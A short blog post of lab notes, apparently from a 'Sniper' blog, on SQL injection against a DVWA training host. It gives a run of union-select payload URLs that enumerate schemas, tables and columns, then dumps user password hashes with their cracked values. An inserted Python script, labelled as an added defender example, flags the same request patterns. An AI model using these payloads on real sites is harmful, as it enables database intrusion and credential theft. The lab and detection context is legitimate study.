Tags: hello
1' and '1'='1
order by 2
http://10.10.10.148/dvwa/vulnerabilities/sqli/?id=1%27%20union%20select%20database(),user()--+&Submit=Submit#
database():dvwa version():5.0.51a-3ubuntu5
user():root @@datadir:/var/lib/mysql/
http://10.10.10.148/dvwa/vulnerabilities/sqli/?id=1%27%20and%201=2%20union%20select%201,schema_name%20from%20information_schema.schemata%20limit%207,8%20%23%20&Submit=Submit#
information_schema,mysql,dvwa,metasploit,owasp10,tikiwiki,tikiwiki195
dvwa:0x64767761
http://10.10.10.148/dvwa/vulnerabilities/sqli/?id=1%27%20and%201=2%20union%20select%201,table_name%20from%20information_schema.tables%20where%20table_schema=0x64767761%20limit%200,7%20%23%20&Submit=Submit#
guestbook,users
users:0x7573657273
http://10.10.10.148/dvwa/vulnerabilities/sqli/?id=1' and 1=2 union select 1,column_name from information_schema.columns where table_schema=0x64767761 and table_name=0x7573657273 limit 0,7%23&Submit=Submit#
user_id,first_name,last_name,user,password,avatar
http://10.10.10.148/dvwa/vulnerabilities/sqli/?id=1' and 1=2 union select user,password from dvwa.users limit 0,7%23&Submit=Submit#
First name: admin
Surname: 5f4dcc3b5aa765d61d8327deb882cf99 ==password
First name: gordonb
Surname: e99a18c428cb38d5f260853678922e03 ==abc123
First name: 1337
Surname: 8d3533d75ae2c3966d7e0d4fcc69216b ==charley
First name: pablo
Surname: 0d107d09f5bbe40cade3de5c71e9e9b7 ==letmein
First name: smithy
Surname: 5f4dcc3b5aa765d61d8327deb882cf99 ==password
password (admin)
password (smithy)
abc123 (gordonb)
letmein (pablo)
charley (1337)
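A defender's view of the requests recorded above, as an added example that is not part of the original post: it URL-decodes the `id` parameter and flags the markers these requests share. The rule names, the two-rule alert threshold and the sample request targets are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Detection rules derived from the request shapes recorded in these notes.
RULES = {
    "quote_break":  re.compile(r"^\s*\d+\s*'"),                       # id=1' ...
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "order_by_n":   re.compile(r"\border\s+by\s+\d+\b", re.I),        # column-count probe
    "schema_enum":  re.compile(r"\binformation_schema\b", re.I),
    "hex_literal":  re.compile(r"\b0x[0-9a-f]{4,}\b", re.I),          # quote-free string
    "env_probe":    re.compile(r"\b(?:database|user|version)\s*\(\s*\)|@@\w+", re.I),
    "comment_tail": re.compile(r"(?:--\s*|#\s*)$"),                   # trailing comment
}

def matched_rules(request_target, param="id"):
    """Return the sorted rule names that fire on the decoded `param` value."""
    query = urlsplit(request_target).query
    hits = set()
    for value in parse_qs(query, keep_blank_values=True).get(param, []):
        for name, rx in RULES.items():
            if rx.search(value):
                hits.add(name)
    return sorted(hits)

def verdict(request_target):
    """'alert' on two or more rules, 'review' on one, 'ok' on none (assumed threshold)."""
    n = len(matched_rules(request_target))
    return "alert" if n >= 2 else "review" if n == 1 else "ok"

# Constructed sample request targets in the shape of access-log entries.
SAMPLES = [
    "/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit",
    "/dvwa/vulnerabilities/sqli/?id=1%27%20union%20select%20database(),user()--+&Submit=Submit",
    "/dvwa/vulnerabilities/sqli/?id=1%27%20and%201=2%20union%20select%201,table_name%20from%20"
    "information_schema.tables%20where%20table_schema=0x64767761%20limit%200,7%20%23%20&Submit=Submit",
    "/dvwa/vulnerabilities/sqli/?id=1%20order%20by%202&Submit=Submit",
]

if __name__ == "__main__":
    for s in SAMPLES:
        print(verdict(s), matched_rules(s))
```

Matching on the decoded parameter value rather than the raw log line is what lets the same rules catch both the percent-encoded and the plain-space forms of these requests.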
This article is from the "Sniper" blog; please be sure to retain this source: http://joka86.blog.51cto.com/7385844/1963743
Original address: http://joka86.blog.51cto.com/7385844/1963743